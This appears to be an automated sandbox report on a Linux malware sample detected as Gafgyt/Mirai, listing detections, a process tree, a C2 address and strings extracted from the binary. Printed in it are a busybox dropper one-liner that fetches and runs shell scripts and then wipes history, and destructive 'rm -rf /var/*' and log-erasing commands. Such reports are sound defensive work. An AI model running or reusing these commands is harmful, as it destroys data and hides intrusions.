Edit tour

Linux Analysis Report
GHfjfgvj.elf

Overview

General Information

Sample name:	GHfjfgvj.elf
Analysis ID:	1670521
MD5:	b3c64aaf5d1e7ead1f485fb2a03046ef
SHA1:	04134158a88d92cebe7f7d2facbf00a3c0160621
SHA256:	ddf9f926f4f02ffa8b6bc44e2054b9e3bb9a8d374072ae0ab329f2d89eb9feac
Tags:	elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai

Score:	84
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Gafgyt

Yara detected Mirai

Sample deletes itself

Creates hidden files and/or directories

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "rm" command used to delete files or directories

Sample and/or dropped files contains symbols with suspicious names

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings that are user agent strings indicative of HTTP manipulation

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1670521
Start date and time:	2025-04-21 20:36:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	GHfjfgvj.elf
Detection:	MAL
Classification:	mal84.troj.evad.linELF@0/1@0/0

Warnings

VT rate limit hit for: 31.58.58.113:666
VT rate limit hit for: http://127.0.0.1/bins.sh;sh
VT rate limit hit for: http://127.0.0.1/scan.py
VT rate limit hit for: http://127.0.0.1/scan.py127.0.0.1bins.shtftp1.shtftp2.shftp1.shntpdsshdopensshbashtftpwgetcronftppft

Runtime Messages

Command:	/tmp/GHfjfgvj.elf
PID:	5429
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	sh: 1: history: not found sh: 1: history: not found

Process Tree

system is lnxubuntu20

GHfjfgvj.elf (PID: 5429, Parent: 5352, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/GHfjfgvj.elf

GHfjfgvj.elf New Fork (PID: 5431, Parent: 5429)

GHfjfgvj.elf New Fork (PID: 5433, Parent: 5431)

GHfjfgvj.elf New Fork (PID: 5435, Parent: 5433)

GHfjfgvj.elf New Fork (PID: 5444, Parent: 5435)

sh (PID: 5444, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"

sh New Fork (PID: 5446, Parent: 5444)

rm (PID: 5446, Parent: 5444, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/GHfjfgvj.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-ljPrVi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-Agc19e /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-hlfXcf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-hWhmqg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi

GHfjfgvj.elf New Fork (PID: 5450, Parent: 5435)

sh (PID: 5450, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /var/log/wtmp"

sh New Fork (PID: 5456, Parent: 5450)

rm (PID: 5456, Parent: 5450, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /var/log/wtmp

GHfjfgvj.elf New Fork (PID: 5457, Parent: 5435)

sh (PID: 5457, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf ~/.bash_history"

sh New Fork (PID: 5462, Parent: 5457)

rm (PID: 5462, Parent: 5457, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.bash_history

GHfjfgvj.elf New Fork (PID: 5463, Parent: 5435)

sh (PID: 5463, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "history -c;history -w"

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Bashlite, Gafgyt	Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.	No Attribution	http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/ https://blog.cyber5w.com/gafgyt-backdoor-analysis https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
GHfjfgvj.elf	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
GHfjfgvj.elf	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
5431.1.00007f8698400000.00007f8698419000.r-x.sdmp	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
5433.1.00007f8698400000.00007f8698419000.r-x.sdmp	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
5435.1.00007f8698400000.00007f8698419000.r-x.sdmp	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
5429.1.00007f8698400000.00007f8698419000.r-x.sdmp	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
Process Memory Space: GHfjfgvj.elf PID: 5429	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
Process Memory Space: GHfjfgvj.elf PID: 5431	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
Process Memory Space: GHfjfgvj.elf PID: 5433	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
Process Memory Space: GHfjfgvj.elf PID: 5435	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
Click to see the 3 entries

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• AV Detection
• Networking
• System Summary
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: GHfjfgvj.elf

Avira: detected

Found malware configuration

Source: GHfjfgvj.elf

Malware Configuration Extractor: Gafgyt {"C2 url": "31.58.58.113:666"}

Multi AV Scanner detection for submitted file

Source: GHfjfgvj.elf	Virustotal: Detection: 50%			Perma Link
Source: GHfjfgvj.elf	ReversingLabs: Detection: 66%

Source: global traffic

TCP traffic: 192.168.2.13:42644 -> 31.58.58.113:666

Source: global traffic

TCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443

Source: unknown	TCP traffic detected without corresponding DNS query: 31.58.58.113
Source: unknown	TCP traffic detected without corresponding DNS query: 31.58.58.113
Source: unknown	TCP traffic detected without corresponding DNS query: 31.58.58.113
Source: unknown	TCP traffic detected without corresponding DNS query: 31.58.58.113
Source: unknown	TCP traffic detected without corresponding DNS query: 31.58.58.113
Source: unknown	TCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.125.190.26

Source: GHfjfgvj.elf	String found in binary or memory: http://127.0.0.1/bins.sh;sh
Source: GHfjfgvj.elf	String found in binary or memory: http://127.0.0.1/scan.py
Source: GHfjfgvj.elf	String found in binary or memory: http://127.0.0.1/scan.py127.0.0.1bins.shtftp1.shtftp2.shftp1.shntpdsshdopensshbashtftpwgetcronftppft

Source: unknown

Network traffic detected: HTTP traffic on port 48202 -> 443

Source: GHfjfgvj.elf	ELF static info symbol of initial sample: Busybox_Payload
Source: GHfjfgvj.elf	ELF static info symbol of initial sample: Payload

Source: Initial sample	String containing 'busybox' found: cd /tmp \|\| cd /var/system \|\| cd /mnt \|\| cd /lib;rm -f /tmp/ \|\| /var/run/ \|\| /var/system/ \|\| /mnt/ \|\| /lib/;cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /;busybox wget 127.0.0.1/bins.sh;chmod 777;sh bins.sh;busybox tftp -g 127.0.0.1 -r tftp1.sh;chmod 777 ;sh tftp1.sh;busybox tftp -g 127.0.0.1 -r tftp2.sh;chmod 777 ;sh tftp2.sh;rm -rf sh;history -c;history -w;rm -rf ~/.bash_history;cd /tmp \|\| cd /var/system \|\| cd /mnt \|\| cd /lib;rm -f /tmp/ \|\| /var/run/ \|\| /var/system/ \|\| /mnt/ \|\| /lib/;cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /;busybox wget 127.0.0.1/bins.sh;chmod 777;sh bins.sh;busybox tftp -g 127.0.0.1 -r tftp1.sh;chmod 777 ;sh tftp1.sh;busybox tftp -g 127.0.0.1 -r tftp2.sh;chmod 777 ;sh tftp2.sh;rm -rf sh;history -c;history -w;rm -rf ~/.bash_history
Source: Initial sample	String containing 'busybox' found: busybox*
Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: MIPSMozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7Mozilla/5.0 (PLAYSTATION 3; 3.55)Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2wii libnup/1.0Mozilla/4.0 (PSP (PlayStation Portable); 2.00)PSP (PlayStation Po
Source: Initial sample	String containing 'busybox' found: Busybox_Payload

Source: classification engine

Classification label: mal84.troj.evad.linELF@0/1@0/0

Source: GHfjfgvj.elf	ELF static info symbol of initial sample: libc/string/mips/memcpy.S
Source: GHfjfgvj.elf	ELF static info symbol of initial sample: libc/string/mips/memset.S
Source: GHfjfgvj.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/mips/crt1.S
Source: GHfjfgvj.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/mips/crti.S
Source: GHfjfgvj.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/mips/crtn.S

Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/php/..	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/gdm3/.cache	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/gdm3/.cache	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/gdm3/.config	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/gdm3/.config	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/gdm3/.local	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/gdm3/.local	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/snapd/assertions/asserts-v0/..	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/snapd/assertions/..	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/snapd/..	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/colord/.cache	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants	Jump to behavior
Source: /usr/bin/rm (PID: 5446)	Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants	Jump to behavior

Source: /tmp/GHfjfgvj.elf (PID: 5444)	Shell command executed: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"	Jump to behavior
Source: /tmp/GHfjfgvj.elf (PID: 5450)	Shell command executed: sh -c "rm -rf /var/log/wtmp"	Jump to behavior
Source: /tmp/GHfjfgvj.elf (PID: 5457)	Shell command executed: sh -c "rm -rf ~/.bash_history"	Jump to behavior
Source: /tmp/GHfjfgvj.elf (PID: 5463)	Shell command executed: sh -c "history -c;history -w"	Jump to behavior

Source: /bin/sh (PID: 5446)	Rm executable: /usr/bin/rm -> rm -rf /tmp/GHfjfgvj.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-ljPrVi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-Agc19e /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-hlfXcf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-hWhmqg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi	Jump to behavior
Source: /bin/sh (PID: 5456)	Rm executable: /usr/bin/rm -> rm -rf /var/log/wtmp	Jump to behavior
Source: /bin/sh (PID: 5462)	Rm executable: /usr/bin/rm -> rm -rf /root/.bash_history	Jump to behavior

Source: submitted sample

Stderr: sh: 1: history: not foundsh: 1: history: not found: exit code = 0

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /usr/bin/rm (PID: 5446)

File: /tmp/GHfjfgvj.elf

Jump to behavior

Source: /tmp/GHfjfgvj.elf (PID: 5429)

Queries kernel information via 'uname':

Jump to behavior

Source: GHfjfgvj.elf, 5429.1.0000556ce517b000.0000556ce5202000.rw-.sdmp, GHfjfgvj.elf, 5431.1.0000556ce517b000.0000556ce5202000.rw-.sdmp, GHfjfgvj.elf, 5433.1.0000556ce517b000.0000556ce5202000.rw-.sdmp, GHfjfgvj.elf, 5435.1.0000556ce517b000.0000556ce5202000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: GHfjfgvj.elf, 5429.1.0000556ce517b000.0000556ce5202000.rw-.sdmp, GHfjfgvj.elf, 5431.1.0000556ce517b000.0000556ce5202000.rw-.sdmp, GHfjfgvj.elf, 5433.1.0000556ce517b000.0000556ce5202000.rw-.sdmp, GHfjfgvj.elf, 5435.1.0000556ce517b000.0000556ce5202000.rw-.sdmp	Binary or memory string: lU!/etc/qemu-binfmt/mips
Source: GHfjfgvj.elf, 5429.1.00007ffe588e6000.00007ffe58907000.rw-.sdmp, GHfjfgvj.elf, 5431.1.00007ffe588e6000.00007ffe58907000.rw-.sdmp, GHfjfgvj.elf, 5433.1.00007ffe588e6000.00007ffe58907000.rw-.sdmp, GHfjfgvj.elf, 5435.1.00007ffe588e6000.00007ffe58907000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: GHfjfgvj.elf, 5429.1.00007ffe588e6000.00007ffe58907000.rw-.sdmp, GHfjfgvj.elf, 5431.1.00007ffe588e6000.00007ffe58907000.rw-.sdmp, GHfjfgvj.elf, 5433.1.00007ffe588e6000.00007ffe58907000.rw-.sdmp, GHfjfgvj.elf, 5435.1.00007ffe588e6000.00007ffe58907000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/GHfjfgvj.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/GHfjfgvj.elf

Stealing of Sensitive Information

Yara detected Gafgyt

Source: Yara match

File source: GHfjfgvj.elf, type: SAMPLE

Yara detected Mirai

Source: Yara match	File source: GHfjfgvj.elf, type: SAMPLE
Source: Yara match	File source: 5431.1.00007f8698400000.00007f8698419000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5433.1.00007f8698400000.00007f8698419000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5435.1.00007f8698400000.00007f8698419000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5429.1.00007f8698400000.00007f8698419000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GHfjfgvj.elf PID: 5429, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GHfjfgvj.elf PID: 5431, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GHfjfgvj.elf PID: 5433, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GHfjfgvj.elf PID: 5435, type: MEMORYSTR

Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Source: Initial sample	User agent string found: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
Source: Initial sample	User agent string found: Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Source: Initial sample	User agent string found: Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
Source: Initial sample	User agent string found: Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0
Source: Initial sample	User agent string found: Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
Source: Initial sample	User agent string found: Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000

Remote Access Functionality

Yara detected Gafgyt

Source: Yara match

File source: GHfjfgvj.elf, type: SAMPLE

Yara detected Mirai

Source: Yara match	File source: GHfjfgvj.elf, type: SAMPLE
Source: Yara match	File source: 5431.1.00007f8698400000.00007f8698419000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5433.1.00007f8698400000.00007f8698419000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5435.1.00007f8698400000.00007f8698419000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5429.1.00007f8698400000.00007f8698419000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GHfjfgvj.elf PID: 5429, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GHfjfgvj.elf PID: 5431, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GHfjfgvj.elf PID: 5433, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GHfjfgvj.elf PID: 5435, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Hidden Files and Directories	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

Threatname: Gafgyt

{
  "C2 url": "31.58.58.113:666"
}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
GHfjfgvj.elf	51%	Virustotal		Browse
GHfjfgvj.elf	67%	ReversingLabs	Linux.Trojan.Gafgyt
GHfjfgvj.elf	100%	Avira	EXP/ELF.Gafgyt.E

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
31.58.58.113:666	0%	Avira URL Cloud	safe
http://127.0.0.1/bins.sh;sh	0%	Avira URL Cloud	safe
http://127.0.0.1/scan.py127.0.0.1bins.shtftp1.shtftp2.shftp1.shntpdsshdopensshbashtftpwgetcronftppft	0%	Avira URL Cloud	safe
http://127.0.0.1/scan.py	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
31.58.58.113:666	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1/bins.sh;sh	GHfjfgvj.elf	false	Avira URL Cloud: safe	unknown
http://127.0.0.1/scan.py	GHfjfgvj.elf	false	Avira URL Cloud: safe	unknown
http://127.0.0.1/scan.py127.0.0.1bins.shtftp1.shtftp2.shftp1.shntpdsshdopensshbashtftpwgetcronftppft	GHfjfgvj.elf	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.58.58.113	unknown	Iran (ISLAMIC Republic Of)		31549	RASANAIR	true
185.125.190.26	unknown	United Kingdom		41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
31.58.58.113	jhUOH.elf	Get hash	malicious	Gafgyt, Mirai	Browse
31.58.58.113	UYyuyioy.elf	Get hash	malicious	Gafgyt, Mirai	Browse
185.125.190.26	sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	na.elf	Get hash	malicious	Prometei	Browse
